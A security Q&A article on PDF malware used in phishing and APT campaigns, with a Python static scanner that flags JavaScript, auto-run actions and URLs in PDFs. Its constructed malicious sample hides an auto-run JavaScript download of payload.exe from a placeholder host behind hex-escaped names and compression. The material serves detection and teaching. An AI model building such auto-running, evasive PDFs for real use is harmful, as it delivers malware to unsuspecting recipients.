
PDF malware: How to spot, prevent emerging PDF attacks

Enterprise threats expert Nick Lewis explores emerging techniques being employed in PDF-based malware attacks and tells how to defend against them.

I've read that PDFs are increasingly being used as part of advanced persistent threat attack campaigns. Could you describe some of the latest techniques attackers use in PDF attacks, and can you suggest tools to use for scanning PDFs for malicious inclusions? Or should antimalware/email scans already be picking up on such threats?


Advanced persistent threat (APT) attack campaigns favor PDF files because most users assume they are safe to open: PDFs are a routine attachment in business and personal email alike. By sending phishing emails disguised as fax messages, scans from a multifunction printer, delivery notices and the like, the attacker hopes to entice the user to open a file that looks trusted but carries malicious content.

To mitigate the threats posed by PDF malware, it is critical to combine security awareness training with technical controls, since neither covers every scenario on its own.

Simply put, traditional signature-based antimalware and email scans will not reliably catch these PDF malware attacks, because the malicious content is typically obfuscated or compressed inside the file. Security tools that open the PDF in a sandbox environment and observe what it does (processes spawned, files dropped, network connections made) can identify malicious behavior that a static scan misses.

Additional tools for scanning potentially malicious PDFs are described by SearchSecurity contributor Lenny Zeltser in his blog post on analyzing malicious documents. These tools identify embedded JavaScript, automatic actions that run when the document is opened, and other strings that reveal what the file is built to do. Once that content has been extracted, it can be analyzed to determine whether it contacts external websites to download additional malware. As a rule, any PDF that contains JavaScript or reaches out to a system outside your network should be investigated.
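The kind of static triage those tools perform can be shown in a few dozen lines. The following is an added example, not code from the article or from Lenny Zeltser's tools: it counts the PDF keywords that indicate active content or external access, resolves the #xx name escapes attackers use to hide those keywords, inflates FlateDecode streams so JavaScript hidden in compressed objects is also searched, and pulls out any URLs. The two sample PDFs are constructed inline for the demonstration; the domain and keyword list are assumptions, not indicators taken from a real campaign.

```python
import re
import zlib

# Keywords that indicate active content or external access.  Any hit warrants
# a closer look, as the article advises.  The list is an assumption for this
# example; it mirrors the names pdfid-style tools report.
SUSPICIOUS_KEYWORDS = (
    b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
    b"/URI", b"/SubmitForm", b"/EmbeddedFile", b"/RichMedia", b"/ObjStm",
)

NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
STREAM_BODY = re.compile(rb"stream\r?\n(.*?)\nendstream", re.DOTALL)
URL = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&*+,;=%-]+")


def inflate_streams(data: bytes) -> list:
    """Return the decompressed body of every Flate-compressed stream.

    Malicious JavaScript is frequently stored in a compressed stream so that a
    plain string search over the file never sees it.  decompressobj() is used
    because it tolerates trailing bytes (e.g. a stray CR before 'endstream')."""
    bodies = []
    for m in STREAM_BODY.finditer(data):
        try:
            bodies.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass  # not Flate-compressed (or corrupt): nothing to inflate
    return bodies


def normalize_names(data: bytes) -> bytes:
    """Resolve PDF name hex escapes, e.g. /Ja#76aScript -> /JavaScript.

    The PDF syntax allows any byte of a name to be written as #xx, and attackers
    use it to hide keywords from naive scanners.  Applying it to the whole
    buffer is fine for triage because the result is only searched, never saved."""
    return NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> dict:
    """Triage a PDF: count suspicious keywords and collect URLs, searching the
    raw bytes plus the decompressed contents of every inflatable stream."""
    views = [data] + inflate_streams(data)
    text = normalize_names(b"\n".join(views))
    counts = {}
    for kw in SUSPICIOUS_KEYWORDS:
        # Match the keyword as a whole name so /JS does not also count /JSX.
        n = len(re.findall(re.escape(kw) + rb"(?![A-Za-z0-9_])", text))
        if n:
            counts[kw.decode()] = n
    urls = sorted({u.decode(errors="replace") for u in URL.findall(text)})
    return {"keywords": counts, "urls": urls}


def should_investigate(report: dict) -> bool:
    """The article's rule: JavaScript, auto-run actions or external access mean
    the file deserves sandbox detonation or manual analysis."""
    k = report["keywords"]
    active = any(x in k for x in ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch"))
    external = bool(report["urls"]) or "/URI" in k or "/SubmitForm" in k
    return active or external


# Constructed sample: a minimal PDF whose catalog runs JavaScript on open.  The
# action names use #xx escapes and the script sits in a Flate-compressed
# stream, two evasions that a plain 'grep /JavaScript' misses.  The domain is
# a placeholder, not a real indicator.
_JS_PAYLOAD = b"app.launchURL('http://malware.example.test/payload.exe');"
_COMPRESSED = zlib.compress(_JS_PAYLOAD)
SAMPLE_MALICIOUS_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 4 0 R /OpenA#63tion 2 0 R >> endobj\n"
    b"2 0 obj << /S /Ja#76aScript /JS 3 0 R >> endobj\n"
    b"3 0 obj << /Length " + str(len(_COMPRESSED)).encode() + b" /Filter /FlateDecode >>\n"
    b"stream\n" + _COMPRESSED + b"\nendstream\nendobj\n"
    b"4 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

# Constructed sample: an ordinary one-page document with no active content.
SAMPLE_BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj\n"
    b"4 0 obj << /Length 37 >>\nstream\nBT /F1 12 Tf (Quarterly report) Tj ET\nendstream\nendobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for label, pdf in (("malicious", SAMPLE_MALICIOUS_PDF), ("benign", SAMPLE_BENIGN_PDF)):
        report = scan_pdf(pdf)
        print(label, report, "-> investigate" if should_investigate(report) else "-> ok")
```

Against the malicious sample the scanner reports /JavaScript, /JS and /OpenAction once each and surfaces the download URL that only exists inside the compressed stream; the benign sample produces no hits. A tool like this is a first-pass filter, not a verdict: a clean report means the file showed none of these markers, while any hit is the cue to hand the file to a sandbox or an analyst.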

This was last published in November 2013
